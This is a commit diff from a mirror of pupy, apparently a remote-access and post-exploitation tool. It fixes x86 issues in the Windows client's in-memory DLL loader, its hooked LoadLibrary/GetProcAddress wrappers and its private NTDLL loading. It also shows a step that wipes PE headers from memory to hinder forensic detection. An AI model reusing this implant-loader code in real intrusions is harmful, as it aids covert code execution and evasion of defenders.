mirror of https://github.com/n1nj4sec/pupy.git
[Experemental] client/windows: Fix x86-related issues
This commit is contained in:
Oleksii Shevchuk
parent
8d7b168889
commit
7f40611cbf
|
|
@ -153,8 +153,9 @@ BOOL initialize_python(int argc, char *argv[], BOOL is_shared_object) {
|
|||
|
||||
Py_IncRef(py_argv);
|
||||
|
||||
for (i = 0; i<argc; i++)
|
||||
for (i = 0; i<argc && argv[i]; i++) {
|
||||
PyList_Append(py_argv, PyString_FromString(argv[i]));
|
||||
}
|
||||
|
||||
PySys_SetObject("executable", PyString_FromString(OSGetProgramName()));
|
||||
PySys_SetObject("argv", py_argv);
|
||||
|
|
@ -163,6 +164,7 @@ BOOL initialize_python(int argc, char *argv[], BOOL is_shared_object) {
|
|||
|
||||
setup_jvm_class();
|
||||
|
||||
dprint("Python initialized\n");
|
||||
return TRUE;
|
||||
|
||||
lbExit1:
|
||||
|
|
@ -191,7 +193,6 @@ void run_pupy() {
|
|||
char *pupy_init_bytecode_c;
|
||||
Py_ssize_t pupy_init_bytecode_c_size;
|
||||
|
||||
|
||||
dprint("Load config\n");
|
||||
len.c[3] = __config__[0];
|
||||
len.c[2] = __config__[1];
|
||||
|
|
|
|||
|
|
@ -195,9 +195,14 @@ FinalizeSection(PMEMORYMODULE module, PSECTIONFINALIZEDATA sectionData) {
|
|||
if (sectionData->address == sectionData->alignedAddress &&
|
||||
(sectionData->last ||
|
||||
module->headers->OptionalHeader.SectionAlignment == module->pageSize ||
|
||||
(sectionData->size % module->pageSize) == 0)
|
||||
) {
|
||||
(sectionData->size % module->pageSize) == 0))
|
||||
{
|
||||
// Only allowed to decommit whole pages
|
||||
dprint(
|
||||
"VirtualFree: %p - %p (%lu)\n",
|
||||
sectionData->address, (PCHAR) sectionData->address + sectionData->size, sectionData->size
|
||||
);
|
||||
|
||||
VirtualFree(sectionData->address, sectionData->size, MEM_DECOMMIT);
|
||||
}
|
||||
return TRUE;
|
||||
|
|
@ -213,6 +218,10 @@ FinalizeSection(PMEMORYMODULE module, PSECTIONFINALIZEDATA sectionData) {
|
|||
}
|
||||
|
||||
// change memory access flags
|
||||
dprint(
|
||||
"VirtualProtect: %p - %p (%lu) %08x\n",
|
||||
sectionData->address, (PCHAR) sectionData->address + sectionData->size, sectionData->size, protect
|
||||
);
|
||||
if (VirtualProtect(sectionData->address, sectionData->size, protect, &oldProtect) == 0) {
|
||||
#ifdef DEBUG_OUTPUT
|
||||
OutputLastError("Error protecting memory page");
|
||||
|
|
@ -285,7 +294,8 @@ ExecuteTLS(PMEMORYMODULE module)
|
|||
PIMAGE_TLS_DIRECTORY tls;
|
||||
PIMAGE_TLS_CALLBACK* callback;
|
||||
|
||||
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_TLS);
|
||||
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(
|
||||
module, IMAGE_DIRECTORY_ENTRY_TLS);
|
||||
if (directory->VirtualAddress == 0) {
|
||||
return TRUE;
|
||||
}
|
||||
|
|
@ -294,6 +304,7 @@ ExecuteTLS(PMEMORYMODULE module)
|
|||
callback = (PIMAGE_TLS_CALLBACK *) tls->AddressOfCallBacks;
|
||||
if (callback) {
|
||||
while (*callback) {
|
||||
dprint("Call TLS Callback %p\n", callback);
|
||||
(*callback)((LPVOID) codeBase, DLL_PROCESS_ATTACH, NULL);
|
||||
callback++;
|
||||
}
|
||||
|
|
@ -809,10 +820,12 @@ HMEMORYMODULE MemoryLoadLibraryEx(
|
|||
|
||||
dprint("MemoryLoadLibraryEx: Library loaded\n");
|
||||
|
||||
#ifndef DEBUG
|
||||
// Cleanup PE headers
|
||||
CleanupHeaders(result);
|
||||
|
||||
dprint("MemoryLoadLibraryEx: headers cleaned up\n");
|
||||
#endif
|
||||
|
||||
return (HMEMORYMODULE)result;
|
||||
|
||||
|
|
|
|||
|
|
@ -39,14 +39,14 @@ typedef void *HCUSTOMMODULE;
|
|||
extern "C" {
|
||||
#endif
|
||||
|
||||
typedef HMODULE (*CustomGetModuleHandleA)(LPCSTR);
|
||||
typedef HMODULE (*CustomGetModuleHandleW)(LPCWSTR);
|
||||
typedef HMODULE (*CustomLoadLibraryExA)(LPCSTR, HANDLE, DWORD);
|
||||
typedef HMODULE (*CustomLoadLibraryExW)(LPCWSTR, HANDLE, DWORD);
|
||||
typedef HCUSTOMMODULE (*CustomLoadLibraryW)(LPCWSTR);
|
||||
typedef HCUSTOMMODULE (*CustomLoadLibraryA)(LPCSTR);
|
||||
typedef FARPROC (*CustomGetProcAddress)(HCUSTOMMODULE, LPCSTR);
|
||||
typedef void (*CustomFreeLibraryFunc)(HCUSTOMMODULE);
|
||||
typedef HMODULE (CALLBACK *CustomGetModuleHandleA)(LPCSTR);
|
||||
typedef HMODULE (CALLBACK *CustomGetModuleHandleW)(LPCWSTR);
|
||||
typedef HMODULE (CALLBACK *CustomLoadLibraryExA)(LPCSTR, HANDLE, DWORD);
|
||||
typedef HMODULE (CALLBACK *CustomLoadLibraryExW)(LPCWSTR, HANDLE, DWORD);
|
||||
typedef HCUSTOMMODULE (CALLBACK *CustomLoadLibraryW)(LPCWSTR);
|
||||
typedef HCUSTOMMODULE (CALLBACK *CustomLoadLibraryA)(LPCSTR);
|
||||
typedef FARPROC (CALLBACK *CustomGetProcAddress)(HCUSTOMMODULE, LPCSTR);
|
||||
typedef void (CALLBACK *CustomFreeLibraryFunc)(HCUSTOMMODULE);
|
||||
|
||||
/**
|
||||
* Load EXE/DLL from memory location.
|
||||
|
|
@ -85,14 +85,6 @@ FARPROC MemoryGetProcAddress(HMEMORYMODULE, LPCSTR);
|
|||
*/
|
||||
void MemoryFreeLibrary(HMEMORYMODULE);
|
||||
|
||||
HMODULE MyGetModuleHandleA(LPCSTR name);
|
||||
HMODULE MyGetModuleHandleW(LPCWSTR name);
|
||||
HMODULE MyLoadLibraryA(LPCSTR name);
|
||||
HMODULE MyLoadLibraryW(LPCWSTR name);
|
||||
|
||||
HMODULE MyLoadLibraryExA(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);
|
||||
HMODULE MyLoadLibraryExW(LPCWSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
|
|
|||
|
|
@ -252,7 +252,7 @@ static PHCUSTOMLIBRARY _AddMemoryModule(
|
|||
/****************************************************************
|
||||
* Public functions
|
||||
*/
|
||||
HMODULE MyGetModuleHandleA(LPCSTR name)
|
||||
HMODULE CALLBACK MyGetModuleHandleA(LPCSTR name)
|
||||
{
|
||||
PHCUSTOMLIBRARY lib;
|
||||
|
||||
|
|
@ -331,7 +331,8 @@ BOOL _CreateModuleMapping(HMODULE hModule, HANDLE *phMapping, PVOID *ppvMem)
|
|||
return TRUE;
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPrivate)
|
||||
HMODULE
|
||||
MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPrivate)
|
||||
{
|
||||
HMODULE hLoadedModule = NULL;
|
||||
|
||||
|
|
@ -402,7 +403,7 @@ HMODULE MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPriva
|
|||
return LoadLibrary(name);
|
||||
}
|
||||
|
||||
HMODULE MyGetModuleHandleW(LPCWSTR name) {
|
||||
HMODULE CALLBACK MyGetModuleHandleW(LPCWSTR name) {
|
||||
PSTR pszName = NULL;
|
||||
HMODULE hResult = NULL;
|
||||
DWORD dwRequiredSize = WideCharToMultiByte(
|
||||
|
|
@ -435,7 +436,7 @@ HMODULE MyGetModuleHandleW(LPCWSTR name) {
|
|||
return GetModuleHandleW(name);
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||
HMODULE CALLBACK MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||
HMODULE hModule = MyGetModuleHandleA(name);
|
||||
if (hModule)
|
||||
return hModule;
|
||||
|
|
@ -443,7 +444,7 @@ HMODULE MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
|||
return LoadLibraryExA(name, hFile, dwFlags);
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||
HMODULE CALLBACK MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||
HMODULE hModule = MyGetModuleHandleW(name);
|
||||
if (hModule)
|
||||
return hModule;
|
||||
|
|
@ -451,7 +452,7 @@ HMODULE MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
|||
return LoadLibraryExW(name, hFile, dwFlags);
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryA(LPCSTR name) {
|
||||
HMODULE CALLBACK MyLoadLibraryA(LPCSTR name) {
|
||||
HMODULE hModule = MyGetModuleHandleA(name);
|
||||
if (hModule)
|
||||
return hModule;
|
||||
|
|
@ -459,7 +460,7 @@ HMODULE MyLoadLibraryA(LPCSTR name) {
|
|||
return LoadLibraryA(name);
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryW(LPCWSTR name) {
|
||||
HMODULE CALLBACK MyLoadLibraryW(LPCWSTR name) {
|
||||
HMODULE hModule = MyGetModuleHandleW(name);
|
||||
if (hModule)
|
||||
return hModule;
|
||||
|
|
@ -467,7 +468,7 @@ HMODULE MyLoadLibraryW(LPCWSTR name) {
|
|||
return LoadLibraryW(name);
|
||||
}
|
||||
|
||||
BOOL MyFreeLibrary(HMODULE module)
|
||||
BOOL CALLBACK MyFreeLibrary(HMODULE module)
|
||||
{
|
||||
PHCUSTOMLIBRARY lib = _FindMemoryModule(NULL, module);
|
||||
if (lib) {
|
||||
|
|
@ -540,7 +541,7 @@ BOOL isAllowedSymbol(PHCUSTOMLIBRARY lib, LPCSTR procname) {
|
|||
return FALSE;
|
||||
}
|
||||
|
||||
FARPROC MyGetProcAddress(HMODULE module, LPCSTR procname)
|
||||
FARPROC CALLBACK MyGetProcAddress(HMODULE module, LPCSTR procname)
|
||||
{
|
||||
PHCUSTOMLIBRARY lib;
|
||||
FARPROC fpFunc = NULL;
|
||||
|
|
|
|||
|
|
@ -3,16 +3,22 @@
|
|||
|
||||
#include <windows.h>
|
||||
|
||||
#ifndef CALLBACK
|
||||
#define CALLBACK WINAPI
|
||||
#endif
|
||||
|
||||
HMODULE MyLoadLibrary(LPCSTR, void *, void *);
|
||||
HMODULE MyLoadLibraryEx(LPCSTR, void *, void *, BOOL);
|
||||
|
||||
HMODULE MyGetModuleHandle(LPCSTR);
|
||||
BOOL MyFreeLibrary(HMODULE);
|
||||
HMODULE CALLBACK MyLoadLibraryA(LPCSTR);
|
||||
HMODULE CALLBACK MyLoadLibraryW(LPCWSTR);
|
||||
HMODULE CALLBACK MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags);
|
||||
HMODULE CALLBACK MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags);
|
||||
HMODULE CALLBACK MyGetModuleHandleA(LPCSTR name);
|
||||
HMODULE CALLBACK MyGetModuleHandleW(LPCWSTR name);
|
||||
FARPROC CALLBACK MyGetProcAddress(HMODULE, LPCSTR);
|
||||
BOOL CALLBACK MyFreeLibrary(HMODULE module);
|
||||
|
||||
HMODULE MyLoadLibraryA(LPCSTR);
|
||||
HMODULE MyLoadLibraryW(LPCWSTR);
|
||||
|
||||
FARPROC MyGetProcAddress(HMODULE, LPCSTR);
|
||||
FARPROC MyFindProcAddress(LPCSTR modulename, LPCSTR procname);
|
||||
|
||||
VOID MySetLibraries(PVOID pLibraries);
|
||||
|
|
|
|||
|
|
@ -14,10 +14,10 @@
|
|||
#define PATH_MAX 260
|
||||
#endif
|
||||
|
||||
typedef FARPROC (*resolve_symbol_t) (HMODULE hModule, const char *name);
|
||||
typedef FARPROC (WINAPI *resolve_symbol_t) (HMODULE hModule, const char *name);
|
||||
|
||||
static char *OSGetProgramName() {
|
||||
static char *program_name = NULL;
|
||||
static const char *program_name = "";
|
||||
static BOOL is_set = FALSE;
|
||||
|
||||
wchar_t exe[PATH_MAX];
|
||||
|
|
|
|||
|
|
@ -166,6 +166,30 @@ static const PSTR Kernel32AllowedPrefixes[] = {
|
|||
"Write", "Read", "Terminate", "Resume", "Virtual",
|
||||
"Reg", NULL
|
||||
};
|
||||
|
||||
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
|
||||
LPFN_ISWOW64PROCESS fnIsWow64Process;
|
||||
|
||||
BOOL IsWow64()
|
||||
{
|
||||
#ifdef WIN_X86
|
||||
BOOL bIsWow64 = TRUE;
|
||||
|
||||
//IsWow64Process is not available on all supported versions of Windows.
|
||||
//Use GetModuleHandle to get a handle to the DLL that contains the function
|
||||
//and GetProcAddress to get a pointer to the function if available.
|
||||
|
||||
fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(
|
||||
GetModuleHandle("kernel32"),"IsWow64Process");
|
||||
|
||||
if(NULL != fnIsWow64Process)
|
||||
fnIsWow64Process(GetCurrentProcess(),&bIsWow64);
|
||||
|
||||
return bIsWow64;
|
||||
#else
|
||||
return FALSE;
|
||||
#endif
|
||||
}
|
||||
#endif
|
||||
|
||||
void initialize(BOOL isDll, on_exit_session_t *cb) {
|
||||
|
|
@ -185,9 +209,13 @@ void initialize(BOOL isDll, on_exit_session_t *cb) {
|
|||
dprint("TEMPLATE REV: %s\n", GIT_REVISION_HEAD);
|
||||
|
||||
#ifdef _PUPY_PRIVATE_NT
|
||||
hNtDll = GetModuleHandleA("NTDLL.DLL");
|
||||
hKernelBase = GetModuleHandleA("KERNELBASE.DLL");
|
||||
hKernel32 = GetModuleHandleA("KERNEL32.DLL");
|
||||
if (IsWow64()) {
|
||||
dprint("WOW64 + _PUPY_PRIVATE_NT known to be broken right now\n");
|
||||
} else {
|
||||
hNtDll = GetModuleHandleA("NTDLL.DLL");
|
||||
hKernelBase = GetModuleHandleA("KERNELBASE.DLL");
|
||||
hKernel32 = GetModuleHandleA("KERNEL32.DLL");
|
||||
}
|
||||
|
||||
if (hNtDll && hKernel32 && hKernelBase) {
|
||||
HMODULE hPrivate;
|
||||
|
|
|
|||
Loading…
Reference in New Issue